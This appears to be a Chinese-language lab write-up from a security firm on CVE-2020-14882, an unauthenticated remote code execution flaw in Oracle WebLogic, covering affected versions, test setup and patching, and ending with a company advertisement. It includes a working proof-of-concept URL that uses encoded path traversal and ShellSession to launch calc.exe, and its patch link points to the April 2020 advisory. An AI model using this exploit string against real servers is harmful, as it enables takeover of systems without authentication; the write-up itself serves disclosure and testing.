CVE-2020-14882 weblogic 远程代码执行漏洞

0x01漏洞简述

CVE-2020-14882 weblogic server 远程代码执行漏洞，攻击者可以通过发送恶意的get请求，在未经身份验证的情况下来控制weblogic server 并且执行任意代码。

0x02知识扩展

WebLogic Server是美国Oracle公司的主要产品之一，其主要用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用，是商业市场上主要的Java(J2EE)应用服务器软件之一。

0x03风险等级

漏洞的评定结果如下：

评定方式      等级

威胁等级      严重

影响面          广泛

0x04影响版本

Oracle Weblogic Server 10.3.6.0.0

Oracle Weblogic Server 12.1.3.0.0

Oracle Weblogic Server 12.2.1.3.0

Oracle Weblogic Server 12.2.1.4.0

Oracle Weblogic Server 14.1.1.0.0

0x05漏洞环境搭建

所需系统环境及配置信息

windows server 2019

ip地址

10.0.20.9

所需工具

WebLogic12.2.1.4

浏览器

安装步骤

下载weblogic12.2.1.4

https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html

安装weblogic

java -jar fmw_12.2.1.4.0_wls_lite_generic.jar

安装完毕

0x06漏洞验证

浏览器访问

http://10.0.20.9:7001/console

在连接后添加poc，执行命令

Poc：

`/console/images/%252E%252E%252Fconsole.portal？_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22)`

后台报错，弹出计算机。

0x07修复建议

下载补丁

`https://www.oracle.com/security-alerts/cpuapr2020.html`

END

如果您遇到网络安全问题

欢迎致电：0991-8156363

或发送至：sudo@xjsec.cn

新疆海狼科技，您身边的网络安全助理